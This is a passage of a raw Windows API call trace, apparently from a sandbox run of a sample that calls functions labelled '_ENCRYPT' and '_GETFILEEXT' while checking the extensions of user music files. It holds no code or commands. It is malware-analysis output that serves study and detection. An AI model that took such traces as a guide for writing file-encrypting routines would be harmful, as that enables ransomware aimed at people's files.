(HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0187.128] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0187.128] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8a8 | out: hHeap=0x8a0000) returned 1 [0187.128] CloseHandle (hObject=0x138) returned 1 [0187.128] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0187.128] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0187.128] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0187.129] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0187.129] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0187.129] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0187.129] FreeLibrary (hLibModule=0x75990000) returned 1 [0187.129] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0187.129] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0187.129] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0187.129] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0187.129] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0187.129] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0187.129] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0187.129] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0187.129] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0187.129] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0187.129] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0187.129] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0187.129] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0187.129] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de830 | out: hHeap=0x8a0000) returned 1 [0187.129] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0187.129] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0187.129] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0187.129] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0187.129] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0187.129] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0187.129] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0187.129] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0187.129] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0187.129] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0187.129] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0187.130] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0187.130] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0187.130] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0187.130] PeekMessageW (in: lpMsg=0x87f094, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f094) returned 0 [0187.130] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0187.130] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p3", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0187.130] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mp3", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0187.130] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mp3", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0187.130] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0187.130] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0187.130] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0187.130] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\uvLMHuUMLBjPgdhq.mp3", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x84061af0, ftCreationTime.dwHighDateTime=0x1d5e3eb, ftLastAccessTime.dwLowDateTime=0x36fe5e90, ftLastAccessTime.dwHighDateTime=0x1d5da70, ftLastWriteTime.dwLowDateTime=0x36fe5e90, ftLastWriteTime.dwHighDateTime=0x1d5da70, nFileSizeHigh=0x0, nFileSizeLow=0x12af2, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="uvLMHuUMLBjPgdhq.mp3", cAlternateFileName="UVLMHU~1.MP3")) returned 0x90add8 [0187.131] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0187.131] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0187.131] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\uvLMHuUMLBjPgdhq.mp3", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x84061af0, ftCreationTime.dwHighDateTime=0x1d5e3eb, ftLastAccessTime.dwLowDateTime=0x36fe5e90, ftLastAccessTime.dwHighDateTime=0x1d5da70, ftLastWriteTime.dwLowDateTime=0x36fe5e90, ftLastWriteTime.dwHighDateTime=0x1d5da70, nFileSizeHigh=0x0, nFileSizeLow=0x12af2, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="uvLMHuUMLBjPgdhq.mp3", cAlternateFileName="UVLMHU~1.MP3")) returned 0x90add8 [0187.132] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0187.132] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0187.132] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\uvLMHuUMLBjPgdhq.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0187.132] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\uvLMHuUMLBjPgdhq.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0187.132] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\uvLMHuUMLBjPgdhq.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0187.132] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\uvLMHuUMLBjPgdhq.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0187.132] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\uvLMHuUMLBjPgdhq.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.132] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\uvLMHuUMLBjPgdhq.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.132] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\uvLMHuUMLBjPgdhq.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0187.132] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\uvLMHuUMLBjPgdhq.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.132] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\uvLMHuUMLBjPgdhq.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.132] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\uvLMHuUMLBjPgdhq.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0187.132] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\uvLMHuUMLBjPgdhq.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0187.132] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\uvLMHuUMLBjPgdhq.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.132] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\uvLMHuUMLBjPgdhq.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0187.132] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\uvLMHuUMLBjPgdhq.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.132] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\uvLMHuUMLBjPgdhq.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.132] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\uvLMHuUMLBjPgdhq.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.132] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\uvLMHuUMLBjPgdhq.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.132] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\uvLMHuUMLBjPgdhq.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.132] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\uvLMHuUMLBjPgdhq.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0187.132] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\uvLMHuUMLBjPgdhq.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.132] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\uvLMHuUMLBjPgdhq.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.132] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\uvLMHuUMLBjPgdhq.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0187.132] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\uvLMHuUMLBjPgdhq.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.132] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\uvLMHuUMLBjPgdhq.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0187.132] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\uvLMHuUMLBjPgdhq.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.133] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\uvLMHuUMLBjPgdhq.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.133] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\uvLMHuUMLBjPgdhq.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.133] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\uvLMHuUMLBjPgdhq.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0187.133] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\uvLMHuUMLBjPgdhq.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.133] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\uvLMHuUMLBjPgdhq.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.133] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\uvLMHuUMLBjPgdhq.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0187.133] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\uvLMHuUMLBjPgdhq.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.133] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="usic\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\uvLMHuUMLBjPgdhq.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.133] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sic\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\uvLMHuUMLBjPgdhq.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.133] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ic\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\uvLMHuUMLBjPgdhq.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.133] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="c\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\uvLMHuUMLBjPgdhq.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0187.133] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\uvLMHuUMLBjPgdhq.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0187.133] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\uvLMHuUMLBjPgdhq.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0187.133] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\uvLMHuUMLBjPgdhq.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.133] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="YJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\uvLMHuUMLBjPgdhq.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.133] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\uvLMHuUMLBjPgdhq.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.133] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="oLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\uvLMHuUMLBjPgdhq.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.133] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\uvLMHuUMLBjPgdhq.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.133] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\uvLMHuUMLBjPgdhq.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.133] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\uvLMHuUMLBjPgdhq.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.133] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="QISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\uvLMHuUMLBjPgdhq.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.133] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\uvLMHuUMLBjPgdhq.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.133] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SXnK0OL\\fgMpL3n\\rWwrmZhuo4\\uvLMHuUMLBjPgdhq.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.133] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XnK0OL\\fgMpL3n\\rWwrmZhuo4\\uvLMHuUMLBjPgdhq.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.133] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nK0OL\\fgMpL3n\\rWwrmZhuo4\\uvLMHuUMLBjPgdhq.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.133] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="K0OL\\fgMpL3n\\rWwrmZhuo4\\uvLMHuUMLBjPgdhq.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.133] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0OL\\fgMpL3n\\rWwrmZhuo4\\uvLMHuUMLBjPgdhq.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0187.133] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="OL\\fgMpL3n\\rWwrmZhuo4\\uvLMHuUMLBjPgdhq.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.133] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="L\\fgMpL3n\\rWwrmZhuo4\\uvLMHuUMLBjPgdhq.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.133] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\fgMpL3n\\rWwrmZhuo4\\uvLMHuUMLBjPgdhq.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0187.133] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="fgMpL3n\\rWwrmZhuo4\\uvLMHuUMLBjPgdhq.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0187.133] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="gMpL3n\\rWwrmZhuo4\\uvLMHuUMLBjPgdhq.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.133] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MpL3n\\rWwrmZhuo4\\uvLMHuUMLBjPgdhq.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.133] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pL3n\\rWwrmZhuo4\\uvLMHuUMLBjPgdhq.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.134] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="L3n\\rWwrmZhuo4\\uvLMHuUMLBjPgdhq.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.134] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3n\\rWwrmZhuo4\\uvLMHuUMLBjPgdhq.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0187.134] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n\\rWwrmZhuo4\\uvLMHuUMLBjPgdhq.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.134] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\rWwrmZhuo4\\uvLMHuUMLBjPgdhq.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0187.134] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rWwrmZhuo4\\uvLMHuUMLBjPgdhq.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.134] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WwrmZhuo4\\uvLMHuUMLBjPgdhq.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.134] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wrmZhuo4\\uvLMHuUMLBjPgdhq.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.134] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rmZhuo4\\uvLMHuUMLBjPgdhq.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.134] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mZhuo4\\uvLMHuUMLBjPgdhq.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.134] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Zhuo4\\uvLMHuUMLBjPgdhq.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.134] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="huo4\\uvLMHuUMLBjPgdhq.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.134] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uo4\\uvLMHuUMLBjPgdhq.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.134] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="o4\\uvLMHuUMLBjPgdhq.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.134] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4\\uvLMHuUMLBjPgdhq.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0187.134] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\uvLMHuUMLBjPgdhq.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0187.134] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uvLMHuUMLBjPgdhq.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.134] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="vLMHuUMLBjPgdhq.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.134] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LMHuUMLBjPgdhq.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.134] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MHuUMLBjPgdhq.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.134] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HuUMLBjPgdhq.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.134] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uUMLBjPgdhq.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.134] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="UMLBjPgdhq.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.134] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MLBjPgdhq.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.134] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LBjPgdhq.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.134] CompareStringW (Locale=0x400, dwCmpFlags=0x1, 